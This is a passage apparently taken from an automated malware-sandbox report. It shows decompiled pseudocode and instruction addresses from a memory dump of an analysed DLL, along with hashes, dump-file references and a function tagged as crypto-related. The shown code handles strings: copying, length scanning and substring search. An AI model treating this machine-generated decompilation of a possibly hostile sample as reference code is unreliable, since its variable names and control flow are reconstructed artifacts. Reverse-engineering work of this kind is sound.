								__eflags = _t312;
								if(_t312 != 0) {
									break;
								}
								_t288 = _t288 + 8;
								__eflags = _t288 - _t395;
								if(_t288 < _t395) {
									continue;
								}
								__eflags = _t395 - 0x7fffffff;
								if(_t395 >= 0x7fffffff) {
									L22:
									_t418 = 0x40;
									_t345 = 0x7fffffff;
									goto L23;
								} else {
									goto L20;
								}
								while(1) {
									L20:
									__eflags =  *(_t417 + _t395 * 2) & 0x0000ffff;
									if(( *(_t417 + _t395 * 2) & 0x0000ffff) == 0) {
										break;
									}
									_t395 = _t395 + 1;
									__eflags = _t395 - 0x7fffffff;
									if(_t395 < 0x7fffffff) {
										continue;
									}
									goto L22;
								}
								L64:
								__eflags = _t345 - 0xfffffffe;
								if(_t345 != 0xfffffffe) {
									_t418 = 0x40;
								} else {
									 *_t417 = _t296;
									_t418 = _v36;
								}
								goto L23;
							}
							asm("bsf edx, ecx");
							_t345 = (_t395 >> 1) + _t288;
							goto L64;
						}
						_t395 = _t296;
						__eflags = _t288 & 0x00000001;
						if((_t288 & 0x00000001) != 0) {
							goto L20;
						}
						_t288 =  ~_t288 + 0x10 >> 1;
						__eflags = _t288;
						while(1) {
							_t312 =  *(_t417 + _t395 * 2) & 0x0000ffff;
							__eflags = _t312;
							if(_t312 == 0) {
								goto L64;
							}
							_t395 = _t395 + 1;
							__eflags = _t395 - _t288;
							if(_t395 < _t288) {
								continue;
							}
							goto L16;
						}
						goto L64;
					}
					_t227 =  &_v40;
					goto L38;
				}
				if(_t417 == 0) {
					L6:
					_push(2);
					_push(_t344);
					E6E7910B0();
					_t447 = _t447 + 8;
					goto L8;
				}
				_t293 =  *_t344 & 0x0000ffff;
				 *_t417 = _t293;
				if(_t293 == 0) {
					goto L6;
				}
				_t294 = 0;
				while(1) {
					_t294 = _t294 + 1;
					_t312 =  *(_t344 + _t294 * 4 - 2) & 0x0000ffff;
					 *(_t417 + _t294 * 4 - 2) = _t312;
					if(_t312 == 0) {
						goto L6;
					}
					_t312 =  *(_t344 + _t294 * 4) & 0x0000ffff;
					 *(_t417 + _t294 * 4) = _t312;
					if(_t312 != 0) {
						continue;
					}
					goto L6;
				}
				goto L6;
			}

0x6e79a660
0x6e79a66c
0x6e79a66e
0x6e79a672
0x6e79a674
0x6e79a678
0x6e79a682
0x6e79a684
0x6e79a687
0x6e79a68d
0x6e79a6c7
0x6e79a6ca
0x6e79a6ce
0x6e79a6d6
0x6e79a6dc
0x6e79a6e7
0x6e79a6e9
0x6e79ae6d
0x6e79ae72
0x6e79a76d
0x6e79a772
0x6e79a772
0x6e79a775
0x6e79a778
0x6e79a77b
0x6e79a77d
0x6e79a792
0x6e79a795
0x6e79a795
0x6e79a79a
0x6e79a7a2
0x6e79a7a2
0x6e79a7a2
0x6e79a7a3
0x6e79a7aa
0x6e79a7b4
0x6e79a7b8
0x6e79a7b9
0x6e79a7bd
0x6e79a7c2
0x6e79a7c6
0x6e79a7c8
0x6e79a7cb
0x6e79a7cf
0x6e79a7d1
0x6e79a819
0x00000000
0x6e79a7d3
0x6e79a7d3
0x6e79a7d5
0x6e79a804
0x6e79a804
0x6e79a806
0x6e79a807
0x6e79a80b
0x6e79a810
0x6e79a814
0x6e79a81c
0x6e79a820
0x6e79a824
0x6e79a828
0x6e79a82c
0x6e79a830
0x6e79a836
0x6e79a83b
0x6e79a83b
0x6e79a83d
0x6e79a842
0x6e79a84b
0x6e79a84b
0x6e79a850
0x6e79a852
0x6e79a85a
0x6e79a85c
0x6e79a85f
0x6e79a863
0x6e79a8a0
0x6e79a94a
0x6e79a94a
0x6e79a94c
0x6e79a953
0x6e79a953
0x6e79a955
0x6e79a959
0x6e79a961
0x6e79a967
0x6e79a974
0x6e79a974
0x6e79a867
0x6e79a890
0x6e79a890
0x6e79a892
0x6e79a893
0x6e79a898
0x00000000
0x6e79a898
0x6e79a869
0x6e79a86c
0x6e79a871
0x00000000
0x00000000
0x6e79a873
0x6e79a875
0x6e79a875
0x6e79a876
0x6e79a87b
0x6e79a882
0x00000000
0x00000000
0x6e79a884
0x6e79a888
0x6e79a88e
0x00000000
0x00000000
0x00000000
0x6e79a88e
0x00000000
0x6e79a875
0x6e79a844
0x6e79a849
0x6e79a8a8
0x6e79a8aa
0x6e79a8ac
0x6e79a8f5
0x6e79a8f5
0x6e79a8fa
0x6e79a8fc
0x6e79a904
0x6e79a906
0x6e79a909
0x6e79a90b
0x6e79a90d
0x6e79a947
0x00000000
0x6e79a947
0x6e79a90f
0x6e79a911
0x6e79a93a
0x6e79a93a
0x6e79a93c
0x6e79a93d
0x6e79a942
0x00000000
0x6e79a942
0x6e79a913
0x6e79a916
0x6e79a919
0x6e79a91b
0x00000000
0x00000000
0x6e79a91d
0x6e79a91f
0x6e79a91f
0x6e79a920
0x6e79a925
0x6e79a92a
0x6e79a92c
0x00000000
0x00000000
0x6e79a92e
0x6e79a932
0x6e79a936
0x6e79a938
0x00000000
0x00000000
0x00000000
0x6e79a938
0x00000000
0x6e79a91f
0x6e79a8b1
0x6e79a8b3
0x00000000
0x00000000
0x6e79a8b5
0x6e79a8bc
0x6e79a8c2
0x6e79a8c5
0x6e79a8c7
0x6e79a8ca
0x6e79a8ce
0x6e79a8ce
0x6e79a8d5
0x6e79a8db
0x6e79a8de
0x6e79a8e1
0x00000000
0x00000000
0x6e79a8e7
0x6e79a8ec
0x6e79a8ee
0x00000000
0x00000000
0x6e79a8f0
0x6e79a8f0
0x6e79a8f3
0x6e79a8f3
0x00000000
0x6e79a8f3
0x6e79a992
0x6e79a996
0x6e79a999
0x6e79a99c
0x6e79a99e
0x6e79a9a0
0x00000000
0x00000000
0x6e79a9a8
0x6e79a9ab
0x6e79a9af
0x6e79a9b7
0x6e79a9bf
0x6e79a9c3
0x6e79a9c7
0x6e79a9cb
0x6e79a9cf
0x6e79a9d3
0x6e79a9d7
0x6e79a9e7
0x6e79a9e7
0x6e79a9e7
0x6e79a9e9
0x6e79a9eb
0x00000000
0x00000000
0x6e79a9ed
0x6e79a9ef
0x6e79a9f1
0x6e79aa5a
0x6e79aa5a
0x6e79aa5e
0x6e79aa62
0x6e79aa64
0x00000000
0x00000000
0x6e79aa6a
0x6e79aa6b
0x6e79aa70
0x00000000
0x00000000
0x6e79aa72
0x6e79aa7a
0x6e79aa7a
0x6e79aa7f
0x6e79aa7f
0x6e79aa82
0x6e79aa82
0x6e79aa84
0x6e79aa88
0x6e79aa8c
0x6e79aa93
0x6e79aa99
0x6e79aa9f
0x6e79aaa2
0x6e79aaa8
0x6e79aaab
0x6e79aaae
0x00000000
0x00000000
0x6e79aaba
0x6e79aabc
0x6e79aac4
0x6e79aac4
0x6e79aac8
0x6e79aaca
0x6e79aacd
0x6e79aacf
0x00000000
0x00000000
0x6e79aad5
0x6e79aad5
0x6e79aad7
0x6e79aad9
0x6e79ab3a
0x6e79ab3a
0x6e79ab3d
0x6e79ab5f
0x6e79ab6b
0x6e79ab6b
0x6e79ab71
0x6e79ab71
0x6e79ab76
0x6e79ab7a
0x6e79ab7e
0x6e79ab80
0x00000000
0x00000000
0x6e79ab86
0x6e79ab89
0x6e79ab8b
0x00000000
0x00000000
0x6e79ab8d
0x6e79ab8f
0x6e79ab95
0x6e79aba8
0x6e79aba8
0x6e79abad
0x6e79abb2
0x6e79abb4
0x6e79abb6
0x6e79abb8
0x6e79abbe
0x6e79abbe
0x6e79abc0
0x6e79abc0
0x6e79abc2
0x6e79abc5
0x6e79abc8
0x6e79abca
0x6e79ad2f
0x6e79ad2f
0x6e79ad39
0x6e79ad3b
0x6e79ad3e
0x6e79ad40
0x6e79ad42
0x6e79ad7f
0x00000000
0x6e79ad7f
0x6e79ad44
0x6e79ad46
0x6e79ad6f
0x6e79ad6f
0x6e79ad71
0x6e79ad72
0x6e79ad77
0x00000000
0x6e79ad77
0x6e79ad48
0x6e79ad4b
0x6e79ad4e
0x6e79ad50
0x00000000
0x00000000
0x6e79ad52
0x6e79ad54
0x6e79ad54
0x6e79ad55
0x6e79ad5a
0x6e79ad5f
0x6e79ad61
0x00000000
0x00000000
0x6e79ad63
0x6e79ad67
0x6e79ad6b
0x6e79ad6d
0x00000000
0x00000000
0x00000000
0x6e79ad6d
0x00000000
0x6e79ad54
0x6e79abd3
0x6e79abd5
0x00000000
0x00000000
0x6e79abdb
0x6e79abdd
0x6e79ac4d
0x6e79ac52
0x6e79ac52
0x6e79ac55
0x6e79ac58
0x6e79ac5b
0x6e79ac5d
0x6e79ac70
0x6e79ac73
0x6e79ac73
0x6e79ac79
0x6e79ac81
0x6e79ac81
0x6e79ac81
0x6e79ac82
0x6e79ac89
0x6e79ac93
0x6e79ac97
0x6e79ac98
0x6e79ac9c
0x6e79aca1
0x6e79aca5
0x6e79aca8
0x6e79acaa
0x6e79acac
0x6e79acfc
0x00000000
0x6e79acae
0x6e79acae
0x6e79acb0
0x6e79acdf
0x6e79acdf
0x6e79ace1
0x6e79ace2
0x6e79ace6
0x6e79acea
0x6e79acef
0x6e79acf3
0x6e79acf7
0x6e79acff
0x6e79ad03
0x6e79ad06
0x6e79ad08
0x6e79ad08
0x6e79ad0a
0x00000000
0x00000000
0x6e79ad10
0x6e79ad1a
0x6e79ad1a
0x6e79ad1d
0x6e79ad1e
0x6e79ad21
0x6e79ad23
0x00000000
0x00000000
0x6e79ad25
0x6e79ad27
0x6e79ad8e
0x6e79ad90
0x00000000
0x6e79ad90
0x6e79ad29
0x6e79ad29
0x6e79ad2b
0x6e79ad99
0x00000000
0x6e79ad99
0x6e79ad14
0x6e79ad17
0x6e79ad17
0x6e79ad17
0x6e79ad1a
0x6e79acb2
0x6e79acb5
0x6e79acb8
0x6e79acba
0x6e79acbd
0x00000000
0x00000000
0x00000000
0x00000000
0x6e79acbf
0x6e79acbf
0x6e79acbf
0x6e79acc0
0x6e79acc5
0x6e79acca
0x6e79accc
0x00000000
0x00000000
0x6e79acce
0x6e79acd2
0x6e79acd6
0x6e79acd8
0x00000000
0x00000000
0x00000000
0x6e79acd8
0x6e79acda
0x6e79acdd
0x6e79acdd
0x00000000
0x6e79acdd
0x6e79acac
0x6e79ac5f
0x00000000
0x6e79ac5f
0x6e79abe1
0x6e79abe1
0x6e79abe4
0x6e79ac01
0x6e79ac0d
0x6e79ac0d
0x6e79ac13
0x6e79ac13
0x6e79ac18
0x6e79ac1c
0x6e79ac20
0x6e79ac22
0x00000000
0x00000000
0x6e79ac28
0x6e79ac2b
0x6e79ac2d
0x00000000
0x00000000
0x6e79ac2f
0x6e79ac35
0x6e79ac48
0x6e79ac48
0x00000000
0x00000000
0x00000000
0x00000000
0x6e79ac37
0x6e79ac37
0x6e79ac3b
0x6e79ac3d
0x00000000
0x00000000
0x6e79ac3f
0x6e79ac40
0x6e79ac46
0x00000000
0x00000000
0x00000000
0x6e79ac46
0x00000000
0x6e79ac37
0x6e79adbf
0x6e79adc4
0x00000000
0x6e79adc4
0x6e79abe6
0x6e79abe8
0x6e79abeb
0x00000000
0x00000000
0x6e79abf2
0x6e79abf2
0x6e79abf4
0x6e79abf4
0x6e79abf8
0x6e79abfa
0x00000000
0x00000000
0x6e79abfc
0x6e79abfd
0x6e79abff
0x00000000
0x00000000
0x00000000
0x6e79abff
0x00000000
0x6e79abf4
0x6e79abba
0x6e79abbc
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6e79ab97
0x6e79ab97
0x6e79ab9b
0x6e79ab9d
0x00000000
0x00000000
0x6e79ab9f
0x6e79aba0
0x6e79aba6
0x00000000
0x00000000
0x00000000
0x6e79aba6
0x00000000
0x6e79ab97
0x6e79adcb
0x6e79adcd
0x6e79adcf
0x6e79add4
0x00000000
0x6e79add4
0x6e79ab3f
0x6e79ab41
0x6e79ab43
0x00000000
0x00000000
0x6e79ab4a
0x6e79ab4a
0x6e79ab4c
0x6e79ab50
0x6e79ab52
0x00000000
0x00000000
0x6e79ab58
0x6e79ab59
0x6e79ab5b
0x00000000
0x00000000
0x6e79ab5d
0x6e79ab5d
0x00000000
0x6e79ab5d
0x6e79ad87
0x00000000
0x6e79ad87
0x6e79aadb
0x6e79aae0
0x6e79aae2
0x6e79aaea
0x6e79aaec
0x6e79aaef
0x6e79aaf1
0x6e79aaf3
0x6e79ab30
0x00000000
0x6e79ab30
0x6e79aaf5
0x6e79aaf7
0x6e79ab20
0x6e79ab20
0x6e79ab22
0x6e79ab23
0x6e79ab28
0x00000000
0x6e79ab28
0x6e79aaf9
0x6e79aafc
0x6e79aaff
0x6e79ab01
0x00000000
0x00000000
0x6e79ab03
0x6e79ab05
0x6e79ab05
0x6e79ab06
0x6e79ab0b
0x6e79ab10
0x6e79ab12
0x00000000
0x00000000
0x6e79ab14
0x6e79ab18
0x6e79ab1c
0x6e79ab1e
0x00000000
0x00000000
0x00000000
0x6e79ab1e
0x00000000
0x6e79ab05
0x6e79aabe
0x6e79aabf
0x6e79aac2
0x00000000
0x00000000
0x00000000
0x6e79aac2
0x6e79ade9
0x6e79ade9
0x6e79adec
0x00000000
0x00000000
0x6e79adf6
0x6e79adf8
0x00000000
0x00000000
0x6e79adfe
0x6e79ae02
0x6e79ae02
0x6e79ae04
0x6e79ae04
0x6e79ae0e
0x6e79ae11
0x6e79ae17
0x6e79ae21
0x6e79ae24
0x6e79ae27
0x00000000
0x00000000
0x6e79ae31
0x6e79ae33
0x00000000
0x00000000
0x00000000
0x6e79ae35
0x6e79a9db
0x6e79a9df
0x6e79a9e3
0x00000000
0x6e79a9e3
0x6e79ae3a
0x6e79adac
0x6e79adac
0x6e79adae
0x00000000
0x00000000
0x6e79adb4
0x00000000
0x00000000
0x00000000
0x6e79adba
0x6e79a9f3
0x6e79a9f7
0x6e79a9f9
0x6e79a9fd
0x6e79a9ff
0x00000000
0x00000000
0x6e79aa05
0x6e79aa06
0x6e79aa08
0x00000000
0x00000000
0x6e79aa0a
0x6e79aa12
0x00000000
0x6e79aa12
0x6e79ada0
0x00000000
0x6e79aa16
0x6e79aa22
0x6e79aa26
0x6e79aa26
0x6e79aa2b
0x6e79aa2b
0x6e79aa30
0x6e79aa34
0x6e79aa38
0x6e79aa3a
0x00000000
0x00000000
0x6e79aa40
0x6e79aa43
0x6e79aa45
0x00000000
0x00000000
0x6e79aa47
0x6e79aa53
0x6e79aa58
0x00000000
0x00000000
0x00000000
0x6e79aa58
0x6e79ae49
0x6e79ae4e
0x6e79ae52
0x00000000
0x6e79ae58
0x6e79a9e7
0x00000000
0x6e79a849
0x6e79a7d7
0x6e79a7da
0x6e79a7dd
0x6e79a7df
0x00000000
0x00000000
0x6e79a7e1
0x6e79a7e4
0x6e79a7e6
0x6e79a7e6
0x6e79a7e7
0x6e79a7ec
0x6e79a7f1
0x6e79a7f3
0x00000000
0x00000000
0x6e79a7f5
0x6e79a7f9
0x6e79a7fd
0x6e79a7ff
0x00000000
0x00000000
0x00000000
0x6e79a7ff
0x6e79a801
0x00000000
0x6e79a801
0x6e79a7d1
0x6e79a77f
0x00000000
0x6e79a77f
0x6e79a6f1
0x6e79a6f1
0x6e79a6f4
0x6e79a714
0x6e79a718
0x6e79a724
0x6e79a724
0x6e79a72a
0x6e79a72a
0x6e79a72f
0x6e79a733
0x6e79a737
0x6e79a739
0x00000000
0x00000000
0x6e79a73f
0x6e79a742
0x6e79a744
0x00000000
0x00000000
0x6e79a746
0x6e79a74c
0x6e79a763
0x6e79a763
0x6e79a768
0x00000000
0x00000000
0x00000000
0x00000000
0x6e79a74e
0x6e79a74e
0x6e79a752
0x6e79a754
0x00000000
0x00000000
0x6e79a75a
0x6e79a75b
0x6e79a761
0x00000000
0x00000000
0x00000000
0x6e79a761
0x6e79a977
0x6e79a977
0x6e79a97a
0x6e79a988
0x6e79a97c
0x6e79a97c
0x6e79a97f
0x6e79a97f
0x00000000
0x6e79a97a
0x6e79ae61
0x6e79ae66
0x00000000
0x6e79ae66
0x6e79a6f6
0x6e79a6f8
0x6e79a6fa
0x00000000
0x00000000
0x6e79a701
0x6e79a701
0x6e79a703
0x6e79a703
0x6e79a707
0x6e79a709
0x00000000
0x00000000
0x6e79a70f
0x6e79a710
0x6e79a712
0x00000000
0x00000000
0x00000000
0x6e79a712
0x00000000
0x6e79a703
0x6e79a6de
0x00000000
0x6e79a6de
0x6e79a691
0x6e79a6ba
0x6e79a6ba
0x6e79a6bc
0x6e79a6bd
0x6e79a6c2
0x00000000
0x6e79a6c2
0x6e79a693
0x6e79a696
0x6e79a69b
0x00000000
0x00000000
0x6e79a69d
0x6e79a69f
0x6e79a69f
0x6e79a6a0
0x6e79a6a5
0x6e79a6ac
0x00000000
0x00000000
0x6e79a6ae
0x6e79a6b2
0x6e79a6b8
0x00000000
0x00000000
0x00000000
0x6e79a6b8
0x00000000

Strings

@, xrefs: 6E79A6CE

Memory Dump Source

Source File: 00000001.00000002.810775796.000000006E781000.00000020.00020000.sdmp, Offset: 6E780000, based on PE: true

Associated: 00000001.00000002.810755520.000000006E780000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810925082.000000006E7B5000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810943271.000000006E7BB000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810959866.000000006E7BC000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: ae6b3e210800e4c3dadabf5ebb6fe57ad04fee7b8c08fcbeb00b4035cedc0044
Instruction ID: a8d1a8a993df0f72fb190b6cc962f6a072bfc119c20679c1892bde9e02d07a3a
Opcode Fuzzy Hash: ae6b3e210800e4c3dadabf5ebb6fe57ad04fee7b8c08fcbeb00b4035cedc0044
Instruction Fuzzy Hash: CD322671E067138BD7148FA9D66022A73F2FFC5714B15863DE8A58B3A4EB35D802E741

Uniqueness

Uniqueness Score: -1.00%

Function 6E7A1EB0, Relevance: 1.9, Strings: 1, Instructions: 682
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E6E7A1EB0(intOrPtr* __ecx, void* __eflags, signed int* _a4, char _a8) {
				signed int _v20;
				signed int _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				void _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				char* _t210;
				signed int _t211;
				signed int* _t217;
				char* _t221;
				signed int* _t222;
				intOrPtr _t227;
				signed int _t232;
				signed int _t235;
				signed int _t239;
				signed int _t241;
				signed int* _t247;
				signed int _t248;
				signed int _t250;
				signed int _t252;
				signed int _t253;
				signed int _t254;
				signed int _t255;
				signed int _t256;
				signed int _t259;
				signed int _t260;
				signed int _t265;
				signed int _t273;
				signed int _t274;
				signed int _t275;
				char _t276;
				signed int _t278;
				signed int _t279;
				signed int _t282;
				signed int _t283;
				intOrPtr* _t286;
				signed int _t287;
				signed int _t291;
				signed int _t293;
				signed int _t294;
				void* _t296;
				signed int _t299;
				signed int _t300;
				signed int _t302;
				signed int _t303;
				char _t304;
				char _t305;
				signed int _t307;
				signed int _t308;
				signed int _t309;
				signed int _t312;
				signed int _t313;
				signed int _t314;
				signed int _t315;
				signed int _t317;
				signed int _t318;
				signed int _t319;
				void* _t320;
				signed int _t321;
				signed int _t322;
				signed int _t323;
				intOrPtr* _t325;
				char _t326;
				signed int _t327;
				intOrPtr* _t329;
				signed int _t330;
				signed int _t331;
				void* _t333;
				signed int _t334;
				signed int _t335;
				signed int _t336;
				signed int _t337;
				signed int _t338;
				void* _t339;
				signed int _t340;
				signed int _t341;
				signed int _t342;
				void* _t343;
				intOrPtr* _t351;
				signed int _t352;
				signed int _t353;
				signed int _t355;
				char _t357;
				signed int _t360;
				signed int _t361;
				signed int _t366;
				char _t368;
				char _t369;
				char _t370;
				signed int _t372;
				unsigned int _t377;
				signed int _t379;
				intOrPtr _t381;
				signed int _t385;
				signed int _t386;
				signed char* _t392;
				signed int _t393;
				signed int _t395;
				signed int _t401;
				signed int _t402;
				unsigned int _t408;
				signed int _t410;
				void* _t411;
				signed int _t417;
				signed int _t421;
				signed int _t427;
				signed int _t428;
				void* _t431;

				_v56 = 0;
				_t286 = __ecx;
				_v52 = 0;
				_push(0x40);
				_t372 = E6E791030();
				_t431 = (_t428 & 0xfffffff0) - 0x34 + 4;
				_t210 = _v56;
				if(_t210 == 0) {
					 *_t372 = 0;
				} else {
					if(_t372 != 0) {
						_t368 =  *_t210;
						 *_t372 = _t368;
						if(_t368 != 0) {
							_t319 = 0;
							while(1) {
								_t319 = _t319 + 1;
								_t369 =  *((char*)(_t210 + _t319 * 2 - 1));
								 *((char*)(_t372 + _t319 * 2 - 1)) = _t369;
								if(_t369 == 0) {
									goto L6;
								}
								_t370 =  *((char*)(_t210 + _t319 * 2));
								 *((char*)(_t372 + _t319 * 2)) = _t370;
								if(_t370 != 0) {
									continue;
								}
								goto L6;
							}
						}
					}
					L6:
					_push(1);
					_push(_t210);
					E6E7910B0();
					_t431 = _t431 + 8;
				}
				_t211 = _a8;
				_v52 = 0x40;
				_v56 = _t372;
				if(_t211 != 0) {
					__eflags = _t372;
					if(_t372 == 0) {
						_t302 = 0x40;
						_t401 = 0;
					} else {
						_t366 = _t372 & 0x0000000f;
						__eflags = _t366;
						if(_t366 == 0) {
							L15:
							asm("pxor xmm0, xmm0");
							_t427 =  ~( ~_t366 + 0x0000000f & 0x0000000f) + 0x7fffffff;
							__eflags = _t427;
							while(1) {
								asm("movdqu xmm1, [edi+edx]");
								asm("pcmpeqb xmm1, xmm0");
								asm("pmovmskb eax, xmm1");
								__eflags = _t211;
								if(_t211 != 0) {
									break;
								}
								_t366 = _t366 + 0x10;
								__eflags = _t366 - _t427;
								if(_t366 < _t427) {
									continue;
								} else {
									__eflags = _t427 - 0x7fffffff;
									if(_t427 >= 0x7fffffff) {
										L21:
										_t302 = 0x40;
										_t401 = 0x7fffffff;
									} else {
										while(1) {
											__eflags =  *((char*)(_t427 + _t372));
											if( *((char*)(_t427 + _t372)) == 0) {
												goto L174;
											}
											_t427 = _t427 + 1;
											__eflags = _t427 - 0x7fffffff;
											if(_t427 < 0x7fffffff) {
												continue;
											} else {
												goto L21;
											}
											goto L22;
										}
										goto L174;
									}
								}
								goto L22;
							}
							asm("bsf esi, eax");
							_t401 = _t427 + _t366;
							goto L174;
						} else {
							_t401 = 0;
							_t366 =  ~_t366 + 0x10;
							__eflags = _t366;
							while(1) {
								__eflags =  *((char*)(_t401 + _t372));
								if( *((char*)(_t401 + _t372)) == 0) {
									break;
								}
								_t401 = _t401 + 1;
								__eflags = _t401 - _t366;
								if(_t401 < _t366) {
									continue;
								} else {
									goto L15;
								}
								goto L22;
							}
							L174:
							__eflags = _t401 - 0xfffffffe;
							if(_t401 != 0xfffffffe) {
								_t302 = 0x40;
							} else {
								 *_t372 = 0;
								_t302 = _v52;
							}
						}
					}
					L22:
					_t20 = _t401 + 2; // 0x80000001
					_t320 = _t20;
					__eflags = _t320 - 0x40;
					_t321 =  <=  ? 0x40 : _t320;
					__eflags = _t302 - _t321;
					if(_t302 < _t321) {
						_t377 = (_t321 >> 5 >> 0x1a) + _t321 >> 6;
						_t322 = _t321 & 0x8000003f;
						__eflags = _t322;
						if(_t322 < 0) {
							_t322 = (_t322 - 0x00000001 | 0xffffffc0) + 1;
							__eflags = _t322;
						}
						__eflags = _t322;
						_t379 = _t377 + (0 | _t322 > 0x00000000) << 6;
						_push(_t379);
						_t303 = E6E791030();
						_t431 = _t431 + 4;
						_t323 = _v56;
						__eflags = _t323;
						if(_t323 == 0) {
							 *_t303 = 0;
						} else {
							__eflags = _t303;
							if(_t303 != 0) {
								_t282 =  *_t323;
								 *_t303 = _t282;
								__eflags = _t282;
								if(_t282 != 0) {
									_v60 = _t379;
									_t283 = 0;
									__eflags = 0;
									_v64 = _t401;
									_v68 = _t286;
									while(1) {
										_t283 = _t283 + 1;
										_t299 =  *((char*)(_t323 + _t283 * 2 - 1));
										 *(_t303 + _t283 * 2 - 1) = _t299;
										__eflags = _t299;
										if(_t299 == 0) {
											break;
										}
										_t300 =  *((char*)(_t323 + _t283 * 2));
										 *(_t303 + _t283 * 2) = _t300;
										__eflags = _t300;
										if(_t300 != 0) {
											continue;
										}
										break;
									}
									_t379 = _v60;
									_t401 = _v64;
									_t286 = _v68;
								}
							}
							_push(1);
							_push(_t323);
							_v68 = _t303;
							E6E7910B0();
							_t303 = _v68;
							_t431 = _t431 + 8;
						}
						_v52 = _t379;
						_v56 = _t303;
					} else {
						_t303 = _v56;
					}
					 *((char*)(_t303 + _t401)) = _a8;
					_t217 =  &_v56;
					 *((char*)(_t401 +  *_t217 + 1)) = 0;
				} else {
					_t217 =  &_v56;
				}
				_t402 =  *_t217;
				if(_t402 == 0) {
					L39:
					_t325 = _a4;
					_push(0x40);
					 *_t325 = 0;
					 *((intOrPtr*)(_t325 + 4)) = 0;
					_t287 = E6E791030();
					_t431 = _t431 + 4;
					_t221 =  *_a4;
					if(_t221 == 0) {
						 *_t287 = 0;
					} else {
						if(_t287 != 0) {
							_t326 =  *_t221;
							 *_t287 = _t326;
							if(_t326 != 0) {
								_t327 = 0;
								while(1) {
									_t327 = _t327 + 1;
									_t304 =  *((char*)(_t221 + _t327 * 2 - 1));
									 *((char*)(_t287 + _t327 * 2 - 1)) = _t304;
									if(_t304 == 0) {
										goto L45;
									}
									_t305 =  *((char*)(_t221 + _t327 * 2));
									 *((char*)(_t287 + _t327 * 2)) = _t305;
									if(_t305 != 0) {
										continue;
									}
									goto L45;
								}
							}
						}
						L45:
						_push(1);
						_push(_t221);
						E6E7910B0();
						_t431 = _t431 + 8;
					}
					goto L124;
				} else {
					_t227 =  *_t402;
					_v40 = _t227;
					if(_t227 != 0) {
						_v64 =  *_t286;
						_t307 = E6E7A5A90( *_t286, _t402);
						__eflags = _t307;
						if(_t307 == 0) {
							_t329 = _a4;
							_push(0x40);
							 *_t329 = 0;
							 *((intOrPtr*)(_t329 + 4)) = 0;
							_t287 = E6E791030();
							_t431 = _t431 + 4;
							_t232 =  *_a4;
							__eflags = _t232;
							if(_t232 == 0) {
								 *_t287 = 0;
							} else {
								__eflags = _t287;
								if(_t287 != 0) {
									_t330 =  *_t232;
									 *_t287 = _t330;
									__eflags = _t330;
									if(_t330 != 0) {
										_t331 = 0;
										__eflags = 0;
										while(1) {
											_t331 = _t331 + 1;
											_t308 =  *((char*)(_t232 + _t331 * 2 - 1));
											 *(_t287 + _t331 * 2 - 1) = _t308;
											__eflags = _t308;
											if(_t308 == 0) {
												goto L172;
											}
											_t309 =  *((char*)(_t232 + _t331 * 2));
											 *(_t287 + _t331 * 2) = _t309;
											__eflags = _t309;
											if(_t309 != 0) {
												continue;
											}
											goto L172;
										}
									}
								}
								L172:
								_push(1);
								_push(_t232);
								E6E7910B0();
								_t431 = _t431 + 8;
							}
							goto L124;
						} else {
							_t381 = _v40;
							_t235 = _t402 & 0x0000000f;
							_v36 = _t235;
							asm("pxor xmm0, xmm0");
							_v20 = _t402;
							_v44 = _t381 - 0x41;
							_v24 =  ~_t235 + 0x10;
							_v48 = _t381 + 0x20;
							_t333 = 0;
							__eflags = 0;
							while(1) {
								L49:
								_t385 = _t307;
								_t291 = _t307 + 1;
								__eflags = _t291;
								if(_t291 == 0) {
									break;
								}
								__eflags =  *(_t307 + 1);
								if( *(_t307 + 1) != 0) {
									__eflags = _v44 - 0x19;
									_t411 = _t333;
									_t268 =  <=  ? _v48 : _v40;
									_t269 =  <=  ? _v48 : _v40;
									_v60 = _t385;
									_v28 =  <=  ? _v48 : _v40;
									while(1) {
										_t411 = _t411 + 1;
										_t291 = _t291 + 1;
										_t392 = _t307 + _t411;
										_v32 = _t392;
										_t393 =  *_t392 & 0x000000ff;
										__eflags =  *((char*)(_t291 - 1)) + 0xffffffbf - 0x19;
										_t394 =  <=  ? _t393 + 0x20 : _t393;
										_t272 =  <=  ? _t393 + 0x20 : _t393;
										__eflags = ( <=  ? _t393 + 0x20 : _t393) - _v28;
										if(( <=  ? _t393 + 0x20 : _t393) == _v28) {
											break;
										}
										__eflags =  *_t291;
										if( *_t291 != 0) {
											continue;
										} else {
											L54:
											_t385 = _v60;
										}
										goto L55;
									}
									_t307 = _v32;
									_t355 = _v36;
									_t273 = _v24;
									do {
										_t395 = _t355;
										__eflags = _t355;
										if(_t355 == 0) {
											L136:
											_v24 = _t273;
											_t417 =  ~( ~_t395 + 0x0000000f & 0x0000000f) + 0x7fffffff;
											__eflags = _t417;
											_t274 = _v20;
											while(1) {
												asm("movdqu xmm1, [eax+edi]");
												asm("pcmpeqb xmm1, xmm0");
												asm("pmovmskb ebx, xmm1");
												__eflags = _t291;
												if(_t291 != 0) {
													break;
												}
												_t395 = _t395 + 0x10;
												__eflags = _t395 - _t417;
												if(_t395 < _t417) {
													continue;
												} else {
													_v20 = _t274;
													_t275 = _v24;
													__eflags = _t417 - 0x7fffffff;
													if(_t417 >= 0x7fffffff) {
														goto L144;
													} else {
														_t291 = _v20;
														while(1) {
															__eflags =  *((char*)(_t417 + _t291));
															if( *((char*)(_t417 + _t291)) == 0) {
																goto L161;
															}
															_t417 = _t417 + 1;
															__eflags = _t417 - 0x7fffffff;
															if(_t417 < 0x7fffffff) {
																continue;
															} else {
																_v20 = _t291;
																goto L144;
															}
															goto L179;
														}
														goto L161;
													}
												}
												goto L179;
											}
											asm("bsf esi, ebx");
											_v20 = _t274;
											_t417 = _t417 + _t395;
											_t275 = _v24;
											goto L162;
										} else {
											_t291 = _v20;
											_t395 = _t273;
											_t417 = 0;
											__eflags = 0;
											while(1) {
												__eflags =  *((char*)(_t417 + _t291));
												if( *((char*)(_t417 + _t291)) == 0) {
													break;
												}
												_t417 = _t417 + 1;
												__eflags = _t417 - _t273;
												if(_t417 < _t273) {
